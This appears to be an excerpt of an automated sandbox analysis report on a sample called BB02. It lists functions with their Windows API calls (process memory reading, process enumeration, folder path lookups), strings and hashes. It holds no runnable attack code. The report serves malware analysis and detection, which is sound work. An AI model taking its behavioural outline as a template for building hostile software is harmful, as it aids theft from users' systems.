API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
Instruction ID: 20a2bb8d1d454327b535bbdc9da6c54253fd158063a91214acb96b6dc82e2bd5
Opcode Fuzzy Hash: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
Instruction Fuzzy Hash: 1F81F571900205DFC715CF18D988B95BBB2BB44369F29C1E9E4099B3E2D776D882CF94

Function 02502443 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 02502469
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02502545
VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 025025A7
??_V@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02502686), ref: 025025B9

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: MemoryProcessRead$QueryVirtual
String ID:
API String ID: 268806267-0
Opcode ID: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
Instruction ID: 7772520712a80dd74ad7fc811b35337b13faa1d8a0627fbc3732d4b00ca508d6
Opcode Fuzzy Hash: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
Instruction Fuzzy Hash: 93414F71A042199BDF20CFA4DDD8BAEB7B6FB84724F144529ED15DB280D334DD418B98

Function 024E4BE7 Relevance: 6.1, APIs: 4, Instructions: 115memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 024E4C22
RtlAllocateHeap.NTDLL(00000000), ref: 024E4C29
strlen.MSVCRT ref: 024E4CB6
VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 024E4D37

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessProtectVirtualstrlen
String ID:
API String ID: 2355128949-0
Opcode ID: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction ID: 6c0e9a8b55377da0dc5312bda71ff3d55ecafc865914917e6a94d911180a6a4a
Opcode Fuzzy Hash: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction Fuzzy Hash: 0831E720B4833C7F96206BA56C46B9FBED5DF8E760F389053F50856188C9A874058AEA

Function 024F8027 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 024F803F

Part of subcall function 0250A457: std::exception::exception.LIBCMT ref: 0250A46C
Part of subcall function 0250A457: __CxxThrowException@8.LIBCMT ref: 0250A481
Part of subcall function 0250A457: std::exception::exception.LIBCMT ref: 0250A492

std::_Xinvalid_argument.LIBCPMT ref: 024F805D
std::_Xinvalid_argument.LIBCPMT ref: 024F8078
memcpy.MSVCRT(?,?,?,00000000,?,?,024F7F61,00000000,?,?,00000000,?,024E941D,?), ref: 024F80DB

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throwmemcpy
String ID:
API String ID: 285807467-0
Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction ID: 69fd16932c7b7763202ac5dfb0759f1594ea2221a4da8f50ad2a10b0f619b0b5
Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
Instruction Fuzzy Hash: 9F21B1313007008FD364DE2CDD80A2AB7E6BBD5714B614A2FE6828F781D77198408B95

Function 024F8329 Relevance: 6.1, APIs: 4, Instructions: 91stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 024F836C
lstrlen.KERNEL32(00000000), ref: 024F83B2
lstrcpy.KERNEL32(00000000,00000000), ref: 024F83E1
StrCmpCA.SHLWAPI(00000000,00435204), ref: 024F83F9
lstrlen.KERNEL32(00000000), ref: 024F8437
lstrcpy.KERNEL32(00000000,00000000), ref: 024F8466
strtok_s.MSVCRT ref: 024F8476

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlenstrtok_s
String ID:
API String ID: 3280532728-0
Opcode ID: 768ebda093904729c8ef10212cc4165ce45b8672bbd804984e3020a17807c801
Instruction ID: 81e75eaa181190eb01e90e5fa2b0aa4f098c0ff81be5cd65e58616ee281be976
Opcode Fuzzy Hash: 768ebda093904729c8ef10212cc4165ce45b8672bbd804984e3020a17807c801
Instruction Fuzzy Hash: 5C21F3729002059FDB21CF68DC48B9ABBF4EF84314F14419EED499B291EB75D946CB90

Function 024FEF37 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 024FEF7B
lstrcpy.KERNEL32(00000000,?), ref: 024FEFAA
lstrcat.KERNEL32(?,00000000), ref: 024FEFB8
lstrcat.KERNEL32(?,00638930), ref: 024FEFD3

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: 47fe55243a5b675cfebcab6b4270073509a08879d7f49bdfeb7ce43fa0e36e6f
Instruction ID: 15c150380f7fc84089ab95e37deee24e4944a85163eb405d90eb254634601d0c
Opcode Fuzzy Hash: 47fe55243a5b675cfebcab6b4270073509a08879d7f49bdfeb7ce43fa0e36e6f
Instruction Fuzzy Hash: F33162B1A00158AFDB50EF74DC44BED77BAAF84305F10046AEA4697251DBB09E449F94

Function 024FCBA7 Relevance: 6.1, APIs: 4, Instructions: 84stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 024FCBCC
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024FCC09
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024FCC38

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s
String ID:
API String ID: 2610293679-0
Opcode ID: 8cea76b7066e1e6dea59191d9541f2afd9edfcda81442690cd798c04227f8123
Instruction ID: 436e843e23a70cf7853edc6ada1822a36eab3d663092acd0437b203345709936
Opcode Fuzzy Hash: 8cea76b7066e1e6dea59191d9541f2afd9edfcda81442690cd798c04227f8123
Instruction Fuzzy Hash: D321D271E00258AFDB20EFB5DC84AAE7BB8DB48308F04006BD906E7211D774C9469BA4

Function 024F8F67 Relevance: 6.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,004353C8), ref: 024F8F81
ExitProcess.KERNEL32 ref: 024F8F8E
strtok_s.MSVCRT ref: 024F8FA0

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID:
API String ID: 3407564107-0
Opcode ID: 8c38b9cd795a4e66d2f7726302c2b9813b2bd047927f0b7650dd2b94d46ae7f4
Instruction ID: ff1748410c187661c1f5599c2cbb8d8935fa9063eea37cbeb3de59f7854b521e
Opcode Fuzzy Hash: 8c38b9cd795a4e66d2f7726302c2b9813b2bd047927f0b7650dd2b94d46ae7f4
Instruction Fuzzy Hash: 6D015275900209FFDB10DFA4EC8489E77BEEBC8305B00847AFA06D7200E7759A458BA5

Function 02504707 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000), ref: 02504719
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02504734
CloseHandle.KERNEL32(00000000), ref: 0250473B
lstrcpy.KERNEL32(00000000,?), ref: 0250476E

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
String ID:
API String ID: 4028989146-0
Opcode ID: 773b4253516a6d5192202977a408014d72df6e4392408074aa70a8579cbf93d5
Instruction ID: 55897f3aa73654203034c715985e63c91fad32103abb139f6ebaee97b8548830
Opcode Fuzzy Hash: 773b4253516a6d5192202977a408014d72df6e4392408074aa70a8579cbf93d5
Instruction Fuzzy Hash: FFF0C8B09012152BEB21A7749D8CBE67A79AF45704F000194EB45D71C0D7F094858BE4

Function 004087B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040880C
memcpy.MSVCRT(?,?,00000000,00000000,004077D7), ref: 00408852

Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6

Strings

string too long, xrefs: 00408807

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy
String ID: string too long
API String ID: 2304785028-2556327735
Opcode ID: 510cf4668b88527fe00a13118a3b5303f5f61e3204e0d9fa691029505446f86d
Instruction ID: 5d491b80eb8bee1d23d11014c6f0c6c09838216a0de1fe5473ebb2330092f83f
Opcode Fuzzy Hash: 510cf4668b88527fe00a13118a3b5303f5f61e3204e0d9fa691029505446f86d
Instruction Fuzzy Hash: 9421A1613006504BDB259A6C8B84A2AB7E5AB82700B64493FF0D1D77C1DFB9DC40879D

Function 024E8AE7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 024E8B1A

Part of subcall function 0250A40A: std::exception::exception.LIBCMT ref: 0250A41F
Part of subcall function 0250A40A: __CxxThrowException@8.LIBCMT ref: 0250A434
Part of subcall function 0250A40A: std::exception::exception.LIBCMT ref: 0250A445

Strings

yxxx, xrefs: 024E8B24
yxxx, xrefs: 024E8B71

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: yxxx$yxxx
API String ID: 1823113695-1021751087
Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction ID: fee163242bd034fd04b4c7475412774a9d774407622e173898fc510bcb0f6c46
Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
Instruction Fuzzy Hash: 6C3189B5E005199FDF08DF58C891AAEBBB6EB88310F148269E915AF384D734E901CBD1

Function 00408A90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408AA5

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

memcpy.MSVCRT(?,?,?), ref: 00408AEF

Strings

string too long, xrefs: 00408AA0

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentmemcpystd::_std::exception::exception
String ID: string too long
API String ID: 2475949303-2556327735
Opcode ID: cf6b60b1bc04ba4a2ac18f1f7a23f9c920bac7eb4e79507fd8cda2023fcf2671
Instruction ID: fcf71bdc140fe32093c9f7753cd2ddaa01766cb0764a4124a3dd8a078f1da807
Opcode Fuzzy Hash: cf6b60b1bc04ba4a2ac18f1f7a23f9c920bac7eb4e79507fd8cda2023fcf2671
Instruction Fuzzy Hash: C02125727046045BE720CE6DDA4062BB7E6EBD5320F148A3FE885D33C0DF74A9418798

Function 02505B97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 02505BA9

Part of subcall function 0250A40A: std::exception::exception.LIBCMT ref: 0250A41F
Part of subcall function 0250A40A: __CxxThrowException@8.LIBCMT ref: 0250A434
Part of subcall function 0250A40A: std::exception::exception.LIBCMT ref: 0250A445

std::_Xinvalid_argument.LIBCPMT ref: 02505BBC

Strings

Sec-WebSocket-Version: 13, xrefs: 02505BAE

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: Sec-WebSocket-Version: 13
API String ID: 963545896-4220314181
Opcode ID: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
Instruction ID: 9cfd6dbc64321c41baa4bec9e58561c7c84a43beba6290f2033bceda8d88a682
Opcode Fuzzy Hash: 625f04cb9a0d46676825a7364065e981b88a445be79eb14be35e872224d31c74
Instruction Fuzzy Hash: 491130713047408BD7358E2CEC80B197BE6BBD1710FA40A6DE492976C5E761E841CBA9

Function 00408BB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408BBF

Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A

memmove.MSVCRT(?,?,?,?,?,004089E2,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408BF5

Strings

invalid string position, xrefs: 00408BBA

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentmemmovestd::_std::exception::exception
String ID: invalid string position
API String ID: 655285616-1799206989
Opcode ID: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
Instruction ID: 1be7ab364882a8fa79e272fabefde4f39cec4c957e742b5a331aa6ba38d6d88d
Opcode Fuzzy Hash: 7bb33ee19573d8d45d322caacc1546af5578b0847bed3ffa247c93bb799780da
Instruction Fuzzy Hash: D701D4703047014BD7258A2CEE9062AB3F6DBD1704B24093EE1D2DB785DBB8EC828398

Function 024FC3BF Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02504287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 025042B4
Part of subcall function 02504287: lstrcpy.KERNEL32(00000000,?), ref: 025042E9

Part of subcall function 02507557: lstrcpy.KERNEL32(00000000), ref: 02507586
Part of subcall function 02507557: lstrcat.KERNEL32(00000000), ref: 02507592

Part of subcall function 025075A7: lstrlen.KERNEL32(------,024E5D82), ref: 025075B2
Part of subcall function 025075A7: lstrcpy.KERNEL32(00000000), ref: 025075D6
Part of subcall function 025075A7: lstrcat.KERNEL32(?,------), ref: 025075E0

Part of subcall function 02507517: lstrcpy.KERNEL32(00000000), ref: 02507545

Part of subcall function 02504077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 025040AC
Part of subcall function 02504077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 025040D6
Part of subcall function 02504077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,024E1495,?,0000001A), ref: 025040E0

lstrcpy.KERNEL32(00000000,00000000), ref: 024FC5B2
lstrcat.KERNEL32(00000000), ref: 024FC5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 024FC5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024FC629

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
Instruction ID: 073178db0ba21bb4f54bdbe311d7ecb2890984347795e8ec7c7d5583ef1b93c8
Opcode Fuzzy Hash: 5196f8d7d8ffbf8b536d13f2c8f0d4bd6a1504af06b38276e959285185f57b7a
Instruction Fuzzy Hash: 5E319C71E002699BDF10EFB4CC84B9EB7B6AF88309F14446AD505AB250DB74EE41DF50

Function 024FC479 Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02504287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 025042B4
Part of subcall function 02504287: lstrcpy.KERNEL32(00000000,?), ref: 025042E9

Part of subcall function 02507557: lstrcpy.KERNEL32(00000000), ref: 02507586
Part of subcall function 02507557: lstrcat.KERNEL32(00000000), ref: 02507592

Part of subcall function 025075A7: lstrlen.KERNEL32(------,024E5D82), ref: 025075B2
Part of subcall function 025075A7: lstrcpy.KERNEL32(00000000), ref: 025075D6
Part of subcall function 025075A7: lstrcat.KERNEL32(?,------), ref: 025075E0

Part of subcall function 02507517: lstrcpy.KERNEL32(00000000), ref: 02507545

Part of subcall function 02504077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 025040AC
Part of subcall function 02504077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 025040D6
Part of subcall function 02504077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,024E1495,?,0000001A), ref: 025040E0

lstrcpy.KERNEL32(00000000,00000000), ref: 024FC5B2
lstrcat.KERNEL32(00000000), ref: 024FC5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 024FC5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024FC629

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
Instruction ID: 40793648fac1cd7499d9362aa173f095789c3472f41bb622153200d41f056553
Opcode Fuzzy Hash: c3a13b43bfbb22c5b3688386ed9a797ab2b2dd583fad0e3a56070e27306dfb91
Instruction Fuzzy Hash: 6331AF71E002699BDF20EFB4CCC4A9EB7B6AF84309F14546AD905AB251DB74ED41DF40

Function 024FC41C Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02504287: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 025042B4
Part of subcall function 02504287: lstrcpy.KERNEL32(00000000,?), ref: 025042E9

Part of subcall function 02507557: lstrcpy.KERNEL32(00000000), ref: 02507586
Part of subcall function 02507557: lstrcat.KERNEL32(00000000), ref: 02507592

Part of subcall function 025075A7: lstrlen.KERNEL32(------,024E5D82), ref: 025075B2
Part of subcall function 025075A7: lstrcpy.KERNEL32(00000000), ref: 025075D6
Part of subcall function 025075A7: lstrcat.KERNEL32(?,------), ref: 025075E0

Part of subcall function 02507517: lstrcpy.KERNEL32(00000000), ref: 02507545

Part of subcall function 02504077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 025040AC
Part of subcall function 02504077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 025040D6
Part of subcall function 02504077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,024E1495,?,0000001A), ref: 025040E0

lstrcpy.KERNEL32(00000000,00000000), ref: 024FC5B2
lstrcat.KERNEL32(00000000), ref: 024FC5BC
lstrcpy.KERNEL32(00000000,00000000), ref: 024FC5EA
lstrcpy.KERNEL32(00000000,0042D01C), ref: 024FC629

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
Instruction ID: 9b37a139be05f917d737f448764b68aba936192fa0fb583d40af1994021d84f1
Opcode Fuzzy Hash: ea4b98e16ecb482ecbdb8514f55abeb370371b626d7f48b9f57da31b4db55f9c
Instruction Fuzzy Hash: 73317C71E002699BDF10EFB4CC84A9EB7B6AF84309F14546AD505AB250DB74EE45DF40

Function 00421550 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 00421581
lstrcpy.KERNEL32(00000000,?), ref: 004215B9
lstrcpy.KERNEL32(00000000,?), ref: 004215F1
lstrcpy.KERNEL32(00000000,?), ref: 00421629

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
